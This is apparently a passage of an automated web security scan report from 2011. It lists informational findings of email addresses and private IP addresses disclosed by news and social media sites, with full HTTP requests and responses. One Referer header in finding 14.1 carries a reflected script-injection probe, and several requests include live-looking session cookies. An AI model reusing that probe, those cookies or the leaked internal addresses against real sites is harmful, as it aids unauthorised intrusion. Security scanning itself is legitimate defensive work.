* OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/

})(jQuery);
/*
* jQuery UI Effects Blind
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Blind
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
       if(o.callback) o.callback.apply(el[0], arguments); // Callback
           el.dequeue();
       });
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Bounce
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Bounce
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
s); // Callback
           });
       };
       el.queue('fx', function() { el.dequeue(); });
       el.dequeue();
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Clip
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Clip
*
* Depends:
*    effects.core.js
*/
(function($) {


...[SNIP]...
       if(o.callback) o.callback.apply(el[0], arguments); // Callback
           el.dequeue();
       }});
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Drop
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Drop
*
* Depends:
*    effects.core.js
*/
(function($) {


...[SNIP]...
           el.dequeue();
               
               $('.effects-explode').remove();
       
   }, o.duration || 500);
   
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Fold
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Fold
*
* Depends:
*    effects.core.js
*/
(function($) {


...[SNIP]...
f(o.callback) o.callback.apply(el[0], arguments); // Callback
           el.dequeue();
       });
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Highlight
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Highlight
*
* Depends:
*    effects.core.js
*/
;(function($)
...[SNIP]...
lter');
           if(o.callback) o.callback.apply(this, arguments);
           el.dequeue();
       }});
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Pulsate
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Pulsate
*
* Depends:
*    effects.core.js
*/
(function($) {
...[SNIP]...
); // Callback
           });
       };
       el.queue('fx', function() { el.dequeue(); });
       el.dequeue();
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Scale
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Scale
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
           if(o.callback) o.callback.apply(this, arguments); // Callback
           el.dequeue();
       }});
       
   });

};

})(jQuery);
/*
* jQuery UI Effects Shake
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Shake
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
guments); // Callback
       });
       el.queue('fx', function() { el.dequeue(); });
       el.dequeue();
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Slide
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Slide
*
* Depends:
*    effects.core.js
*/
(function($) {

...[SNIP]...
if(o.callback) o.callback.apply(this, arguments); // Callback
           el.dequeue();
       }});
       
   });
   
};

})(jQuery);
/*
* jQuery UI Effects Transfer
*
* Copyright (c) 2008 Aaron Eisenberger (aaronchi@gmail.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http://docs.jquery.com/UI/Effects/Transfer
*
* Depends:
*    effects.core.js
*/
(function($) {
...[SNIP]...
13.16. http://www.observer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.observer.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.observer.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:06 GMT
Server: VoxCAST
Set-Cookie: visitor_page_count=1.5; expires=Mon, 12-Sep-2011 12:45:39 GMT; path=/
X-Powered-By: PHP/5.2.6-1+lenny10
X-Head-Server: Linux web7.observermediagroup.com 2.6.26-1-amd64 #1 SMP Sat Jan 10 17:57:00 UTC 2009 x86_64
X-Pingback: http://www.observer.com/xmlrpc.php
X-Cache: HIT from VoxCAST
Age: 148
Content-Length: 63799
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML>
<html dir="ltr" lang="en-US">
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<!--[if lt IE 9]>
<script src="http://html5shim.google
...[SNIP]...
<a class="tip-us" target="_new" href="mailto:tips@observer.com">
...[SNIP]...
13.17. http://www.popsci.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: web4f D=18707
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Language: en
cache-control: max-age = 300
Content-Length: 116217
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744016 1570730120
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 87

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
with JavaScript 1.0.
Source: Webmonkey Code Library
(http://www.hotwired.com/webmonkey/javascript/code_library/)
Author: Patrick Corcoran
Author Email: patrick@taylor.org
*/

var search_phrase;
var qsParm = new Array();

function parseURLParams(href) {
FORM_DATA = new Object();

...[SNIP]...
13.18. http://www.popsci.com/files/js/220b385f427499380964507975f14862.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsci.com
Path:   /files/js/220b385f427499380964507975f14862.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /files/js/220b385f427499380964507975f14862.js HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 27 Apr 2011 17:25:14 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4e D=12247
Content-Type: application/javascript
Content-Language: en
cache-control: max-age = 3600
Content-Length: 163407
Date: Mon, 12 Sep 2011 12:48:09 GMT
X-Varnish: 1570744021 1570741530
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: webcache11: HIT 8

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-12-0
...[SNIP]...
ion of
* emptying all containers that are used to load content into.
* @type undefined
*
* @name $.ajaxHistory.initialize()
* @cat Plugins/History
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.ajaxHistory = new function() {

var RESET_EVENT = 'historyReset';

var _currentHash = location.hash;
var _states = {};
var _intervalId = null;
var _observeHistory; // define
...[SNIP]...
lt value: "remote-".
* @param Function callback A single function that will be executed when the request is complete.
* @type jQuery
*
* @name remote
* @cat Plugins/Remote
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Implement Ajax driven links in a completely unobtrusive and accessible manner (also known as "Hijax")
* with support for the browser's back/forward navigation buttons and bookmarking.
*

...[SNIP]...
lt value: "remote-".
* @param Function callback A single function that will be executed when the request is complete.
* @type jQuery
*
* @name remote
* @cat Plugins/Remote
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.fn.remote = function(output, settings, callback) {

callback = callback || function() {};
if (typeof settings == 'function') { // shift arguments
callback = settings;
}


...[SNIP]...
current value matches the href attribute of the matched element.
*
* @type jQuery
*
* @name history
* @cat Plugins/History
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.fn.history = function(callback) {
return this.click(function(e) {
// add to history only if true click occured, not a triggered click
if (e.clientX) {
$.a
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
   if (typeof value != 'undefined') { // name and value given, set cookie
       options = options || {};
       if (value === null) {
           value = '';
           option
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
13.19. http://www.popsugar.com/ajaxharness  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popsugar.com
Path:   /ajaxharness

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ajaxharness?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D HTTP/1.1
Host: www.popsugar.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rgk07unke60dp2tedj974stul0; fg_locale=0; client_locale=US; ss2=1; ss1=0%7C1317831674%7CRagyRv6hjbcv%2BGtix0C%2BY4dZ%2F8up68nRfzD4hbTVJBtLKOdC9xxftl3zJEUp7PTXP7qOJ1rs89814sy0hA%2FhkWfj%2F6FYRRgjcZ7uYzsAu14cgul99JwUy0Kis%2Fl2K6pjxO7fH3L5Yl2w0cFgoiMgsQg05%2Fln38Dqgc7S0rs%2FlyS8PCFHteE3YwC%2FgNJuFInmhXdLJrkS%2Bv3FBz8ipIK%2B1Q%3D%3D%7C4094d27d0c2101a64c637dc9108f2ed72f88c0c4; sugarTestGroup=control; __utma=18816312.1919955106.1315849692.1315849692.1315849692.1; __utmb=18816312.2.10.1315849692; __utmc=18816312; __utmz=18816312.1315849692.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __qca=P0-1520096207-1315849692025

Response

HTTP/1.1 200 OK
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: lighttpd/1.4.26
Content-Length: 213380
Date: Mon, 12 Sep 2011 12:47:57 GMT
Connection: close
Set-Cookie: ss1=0%7C1317831677%7C4rKS2S0tUEAw%2FPSqsUWVtSmuIoYL0q9Jw8K5Dmnwz6q%2FsDXs%2BlLhGi%2F7UJ81NlU7nVxY6mcTcBwYD5tn0e1sYPWUKt1Zxe1GMPGeUjdMgE1nefSrrjH758DCT%2BLe6XijyBl1F2pRC3ztkQ6Sb9nmCSV18VS7YX%2BzR5gblWNTBGlNXo13Lde1o3bdgY7zzHkM9Dw2%2Fvxo6dn0YaVAACjkVw%3D%3D%7C9cb6eff54ecc9dfd5bd9438bb38f7dd11e46c683; expires=Wed, 05-Oct-2011 16:21:17 GMT; path=/; httponly

{"replacements":{"sugar-menu-subnav-items":" \n \n \n\n\n\n\n<div id='sn-popsugar' class='site-dropdown popsugar-hp '>\n <div class='sn-col sn-col-1'>\n
...[SNIP]...
eed is any mobile phone with email capabilities, and you can create posts with text and photos from your cell, anytime and anywhere! Join the group and set up your account by emailing a blank email to savory-sights@onsugar.com from the same email your account is associated. Once your account is confirmed you can send all of your delicious food photos to this group via your mobile. Be sure to save savory-sights@onsugar.com in your email contacts. \r\n If you need extra help check out the \n\t\t\t\t\t<\/span>
...[SNIP]...
eed is any mobile phone with email capabilities, and you can create posts with text and photos from your cell, anytime and anywhere! Join the group and set up your account by emailing a blank email to spotted@onsugar.com from the same email your account is associated. Once your account is confirmed you can send all of your adorable pet pictures to this group via your mobile. Be sure to save spotted@onsugar.com in your email contacts. \r\n If you need extra help check out the \n\t\t\t\t\t<\/span>
...[SNIP]...
13.20. http://www.symantec.com/connect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/

Issue detail

The following email address was disclosed in the response:

Request

GET /connect/ HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Mon, 12 Sep 2011 12:28:52 +0000
Vary: Cookie
ETag: "1315830532"
Content-Type: text/html; charset=utf-8
X-Varnish: 1371254795 1371243899
X-Varnish-Cache: HIT
X-Varnish-Hits: 220
Vary: Accept-Encoding
Content-Length: 80288
Cache-Control: public, max-age=2472
Date: Mon, 12 Sep 2011 12:48:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
Exams for FREE &ndash; Register now!
The first 100 candidates (customers or partners) to register for an SCS Certification or STS Accreditation exam will be able to take an exam for FREE!&nbsp; Email Customer_Certifications@Symantec.com&nbsp;or Partner... </div>
...[SNIP]...
14. Private IP addresses disclosed  previous  next
There are 37 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

14.1. http://api.connect.facebook.com/static/v0.4/client_restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.connect.facebook.com
Path:   /static/v0.4/client_restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /static/v0.4/client_restserver.php?r=1315319968 HTTP/1.1
Host: api.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p=
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 501
Content-Type: text/html; charset=utf-8
Expires: Tue, 11 Sep 2012 13:03:51 GMT
X-FB-Server: 10.28.9.126
X-Cnection: close
Date: Mon, 12 Sep 2011 13:03:51 GMT

<!DOCTYPE html><html><head><title>Host Page</title><meta charset="utf-8" /></head><body><p>Client Server</p><script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php"></scr
...[SNIP]...
14.2. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1315849736549 HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "5eb17beefa9c10401e449634ea0d98db"
X-FB-Server: 10.32.173.117
X-Cnection: close
Content-Length: 136250
Cache-Control: public, max-age=1152
Expires: Mon, 12 Sep 2011 13:08:39 GMT
Date: Mon, 12 Sep 2011 12:49:27 GMT
Connection: close
Vary: Accept-Encoding

/*1315831719,169913717,JIT Construction: v438319,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...
14.3. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1315850661827 HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "5eb17beefa9c10401e449634ea0d98db"
X-FB-Server: 10.27.133.131
X-Cnection: close
Content-Length: 136250
Cache-Control: public, max-age=1200
Expires: Mon, 12 Sep 2011 13:24:03 GMT
Date: Mon, 12 Sep 2011 13:04:03 GMT
Connection: close
Vary: Accept-Encoding

/*1315832643,169575811,JIT Construction: v438319,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...
14.4. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBrHuKkpJgP0-8C&w=90&h=90&url=http%3A%2F%2Ftwitpic.com%2Fshow%2Fthumb%2F6hd3in.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.119.42
X-Cnection: close
Content-Length: 2607
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Tue, 13 Sep 2011 12:48:18 GMT
Date: Mon, 12 Sep 2011 12:48:18 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
14.5. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQA-vbuzXFFaeubu&w=90&h=90&url=http%3A%2F%2F2media.nowpublic.net%2Fimages%2F%2F11%2F29%2F1129b1595f1fe130542bb003ca3f4915.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?id=107566832624397&width=292&connections=5&stream=true&header=false&height=530
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.52.34
X-Cnection: close
Content-Length: 2473
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Tue, 13 Sep 2011 12:48:26 GMT
Date: Mon, 12 Sep 2011 12:48:26 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...
14.6. http://player.vimeo.com/video/19872101  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/19872101

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /video/19872101?title=0&byline=0&portrait=0 HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.cargoh.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=256147786.803795514.1314813682.1314847150.1314978007.3; __utmz=256147786.1314978007.3.3.utmcsr=blog.sipvicious.org|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
X-Server: 10.90.128.119
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 8996
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Cargoh Artist Profile - Indigo</title><!--[if lt IE 9]><style>.a.d .z {display: block;}.a.d .bj {background: #000;filter: alpha(opacit
...[SNIP]...
14.7. http://static.ak.connect.facebook.com/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://api.connect.facebook.com/static/v0.4/client_restserver.php?r=1315319968
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "a41b2933626b3fe823a65fbe80ad9685"
X-FB-Server: 10.27.62.103
X-Cnection: close
Content-Length: 18454
Cache-Control: public, max-age=485
Expires: Mon, 12 Sep 2011 13:11:56 GMT
Date: Mon, 12 Sep 2011 13:03:51 GMT
Connection: close
Vary: Accept-Encoding

/*1315628827,169557607,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
14.8. http://static.ak.connect.facebook.com/connect.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: datr=wBc3TiBHvRZVzlo1IH6EEoST; lu=SAa1VWe96iHwXaDAVSJQxUsw

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "a41b2933626b3fe823a65fbe80ad9685"
X-FB-Server: 10.33.27.108
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=707
Expires: Mon, 12 Sep 2011 13:15:39 GMT
Date: Mon, 12 Sep 2011 13:03:52 GMT
Connection: close

/*1315629014,169941868,JIT Construction: v438319,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
